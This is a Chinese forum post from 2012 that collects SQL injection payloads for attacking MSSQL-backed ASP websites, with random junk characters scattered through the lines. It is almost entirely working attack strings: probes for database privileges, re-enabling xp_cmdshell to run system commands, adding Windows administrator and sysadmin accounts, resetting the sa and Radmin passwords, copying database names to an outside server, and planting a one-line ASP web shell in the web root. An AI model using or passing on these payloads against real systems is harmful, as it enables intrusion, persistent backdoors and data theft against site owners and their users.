找回密码
 立即注册
查看: 2592|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令
6 T2 L0 C. r2 Z) |/ L2 M. W//看看是什么权限的
- d3 ~' g. S! `/ ]and 1=(Select IS_MEMBER('db_owner'))3 Z$ m- Q  W$ d7 t9 }
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--' `+ p0 ^% E1 e4 z* \

4 @! L  _  G1 t3 K2 S3 v( R3 f' T; {! E! K//检测是否有读取某数据库的权限
2 ?! N* S( l6 qand 1= (Select HAS_DBACCESS('master'))
) g) R; s1 N6 W( a* ^And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
% u0 H* ?* l2 F2 N6 ]6 l6 P5 [- b0 X" U- H

/ e/ p. Z4 {  l9 {; g5 u数字类型
. k: B4 w9 e) U+ wand char(124)%2Buser%2Bchar(124)=07 ?' o% u. m* F& c" x3 b, M' U

# C# Z! f$ j; k8 Y5 s. g5 s. o字符类型
1 W: E) ~% u$ q. T6 x' K0 z( \1 m: R' and char(124)%2Buser%2Bchar(124)=0 and ''='
/ {' A3 V- y$ k
% a- v; F9 A+ @  k9 B- \搜索类型1 ?  n' C* q1 F( E
' and char(124)%2Buser%2Bchar(124)=0 and '%'='' l1 I4 V: n5 |* v( ]
" B0 }- k# T: y& b' w! I
爆用户名1 L* @6 y$ T6 n( t) O
and user>0* s9 y( }. r) y
' and user>0 and ''='
/ l+ e. `6 f+ y) ?' O- _9 q% w! T4 o+ E* N7 R# J8 r; h7 R+ [: k  a
检测是否为SA权限
6 p3 D& O2 y: F. Mand 1=(select IS_SRVROLEMEMBER('sysadmin'));--& K, S) ]* K  {6 \* Y1 c/ x
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --, g' g8 o! Z/ z

! y" P8 z- P( B检测是不是MSSQL数据库
5 X* v2 V! x& N& Gand exists (select * from sysobjects);-- , V# t; [- b3 g* D4 y/ [
1 v5 i" e, ?3 W1 n0 y
检测是否支持多行
7 ]$ `; g- o2 P, t; S;declare @d int;-- # ]% S& P& s* J$ h# |/ X

' z! `+ C( r( s/ \# C* r& Z恢复 xp_cmdshell2 n" O$ s7 |5 J7 Z
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
6 I) H0 b& T2 b7 A5 K& K, H, {! K5 Q
# U# ~  m1 g4 K5 O0 L; k  q9 _  i, j- l: `1 f) {) m
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
# t& O9 t* h. g! f* |) h) ]
% J( s; J1 R6 p* E5 d7 U//-----------------------
; \# K) X4 ]" U5 R% l//      执行命令, g! b. P! s- s+ f+ @! |3 K
//-----------------------2 N; t' w6 P( w- p
首先开启沙盘模式:
1 y, [  N$ f1 B" p5 x; @3 Xexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',13 ?, L7 B/ I( s: x: H+ n
* B* P; k) a( Z! V1 X1 m. {
然后利用jet.oledb执行系统命令
6 J0 I# D6 ^" w0 t4 kselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')% l4 C6 _/ F( F4 B
" _& n: o! J7 ]
执行命令" N5 k' Z/ h* o- d; x
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
3 q. V! F$ j: @5 G
. X/ R2 p1 _$ l" p0 R5 hEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
; Q7 f" D1 `7 W) x  R" h$ {$ h* b5 E1 E
判断xp_cmdshell扩展存储过程是否存在:
! F! A6 B. n% t- Rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
4 B8 s& Y% m2 p, P6 l8 d9 o; h! T9 U
写注册表2 o/ F5 L7 A. ~/ c
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1& }' n" F! F; {- m
, W1 T- @+ ]3 ~( }3 D& j/ b0 b
REG_SZ
* }. f+ v) ~; Y' I; r" y) ^; ~. S# f8 \7 Y) a
读注册表9 H$ U. U$ b2 y" \
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
# z% P: Y, X# }5 o1 G0 n5 k# a  m) A+ t$ J- V7 n# M5 I; K
读取目录内容1 ?+ e2 p  s3 y5 z! B
exec master..xp_dirtree 'c:\winnt\system32\',1,13 N% d5 G: V6 o2 a: n! @
: D" J! }8 m- _
# j8 s; X: [) c" f" Z
数据库备份4 U0 v' \  O  h6 n* k3 P/ E
backup database pubs to disk = 'c:\123.bak'; H, P2 N9 P* m+ G0 j; d1 l

* x; e1 E0 \  p3 ], \' T//爆出长度
8 _1 e' T6 y) u! WAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--3 l$ V5 f5 \5 h

3 Z/ A2 h* b' F9 W2 I' Z6 }$ P
5 m8 l6 S$ K: U6 z: J) Y
* @, r# q% ]/ u- U8 P+ b  B9 z) F更改sa口令方法:用sql综合利用工具连接后,执行命令:; ]7 e' C. Z8 H- P0 r
exec sp_password NULL,'新密码','sa'5 E; B+ R6 G, \8 t
6 ^  C3 S4 i& H0 S
添加和删除一个SA权限的用户test:
, [, M4 P3 M. Nexec master.dbo.sp_addlogin test,ptlove& x' p# Y6 O1 [
exec master.dbo.sp_addsrvrolemember test,sysadmin5 `. C- d( G- q; q0 z

/ `  N% K) o1 Q& N: Z- {删除扩展存储过过程xp_cmdshell的语句: : v* [: f; R6 l
exec sp_dropextendedproc 'xp_cmdshell'
9 V- ~  x& s7 N5 ?3 ^; l1 n' S
. h/ F9 a" Z# _8 G添加扩展存储过过程9 e+ K3 L, j1 Y! ~: a+ H- @
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
( L5 j4 k( _: J) KGRANT exec On xp_proxiedadata TO public
5 }! R2 B0 v" f& @. C# D
$ n6 B3 X9 b0 U
) {& W) {( U  `停掉或激活某个服务。 ( A1 D" D* r' d3 D' w( [/ A

* l9 ^' B, K8 g' U% f9 @5 N7 Bexec master..xp_servicecontrol 'stop','schedule': R0 L( p/ |) p; v" F! h9 X. Y
exec master..xp_servicecontrol 'start','schedule'4 s/ e, W) r2 {" g

9 v& _- d6 ?4 ^$ n) X5 Vdbo.xp_subdirs
4 @2 x+ c: B; {  s
3 R4 ?# `9 \2 k# x只列某个目录下的子目录。1 l. @% F. P9 k1 h. Q$ T, {
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
4 O3 D- h' }2 B) Q+ _$ X: S3 Y* }9 x% j" a8 R! `, I) T+ V' F+ u
dbo.xp_makecab  E2 Z4 y  M  ^! @3 e; S# }, x

) q! Q( s7 p8 B. O将目标多个档案压缩到某个目标档案之内。( _  K# t) L/ _8 f
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。, e3 n$ S# Y' h( Z

3 {( L0 m- ?' K6 G& F5 V6 Gdbo.xp_makecab9 b1 q! J5 V, d' l' y
'c:\test.cab','mszip',1,
, i- c- B  E9 j5 h6 u6 \'C:\Inetpub\wwwroot\SQLInject\login.asp',
6 T4 _6 F; s$ Z! I4 P'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'$ a- I" X$ _9 R
- @2 Y  ^( Y) B/ i2 K
xp_terminate_process
1 T9 \: U8 P( l4 ~' G& Y4 I; D  N% \3 q
停掉某个执行中的程序,但赋予的参数是 Process ID。
) Z! b! Z. e  y+ Y利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID. [3 y& D  B. V9 D

' E7 |- g( b2 j3 ~  pxp_terminate_process 2484- S3 k& a9 J9 P* F+ O" n" f) D
- t( c( Q# Z6 T2 n3 B# Z
xp_unpackcab
6 G9 n/ i( l* q
% h' |* ?( _4 b2 m" v% d2 G$ ]- W解开压缩档。# ~* M, A; {% C

# j6 ~. c' P$ W5 ~3 Z) fxp_unpackcab 'c:\test.cab','c:\temp',1
* |4 {5 \$ A6 Z6 \. Y9 Z) _+ a+ Q& w- }! I# ]2 X" |

5 k$ c2 X* v$ [) {+ x" d某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234* H: y- j! b$ ]

( ^5 k) M; n4 Y6 ccreate database lcx;/ R2 C' o$ L$ g8 E. o6 S
Create TABLE ku(name nvarchar(256) null);
& ]. B0 k7 _. F, `2 `7 L* W- E# k, @8 F- ]Create TABLE biao(id int NULL,name nvarchar(256) null);
% `7 \1 D0 V' P4 m
! G" p8 Z* c! N4 A# ^; z* H//得到数据库名
3 b3 N4 R' _* P' y# m/ f2 w4 qinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
% w8 A8 S/ X6 {% G- r/ }3 G: T: T% i
0 ~' K/ g2 |% m7 m
//在Master中创建表,看看权限怎样
7 ^# d* }( X! j) C6 H; ~$ Y) VCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--; X. S; k6 f+ A& l! m4 S) x
2 K7 y# ?0 T7 X2 ^& i& y
用 sp_makewebtask直接在web目录里写入一句话马:
5 e+ X6 e& q0 d' ]  ~; k8 khttp://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
7 @4 J' d, l# B) a4 [6 A
/ c1 D/ N8 A& M, g+ J//更新表内容
7 v8 I$ [- P; c/ s' s! v& vUpdate films SET kind = 'Dramatic' Where id = 1239 E+ ?" a6 f* ~* x/ N

4 }! z& B# ]2 R! F//删除内容- z; W4 }2 \) l6 P; w$ q; u
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表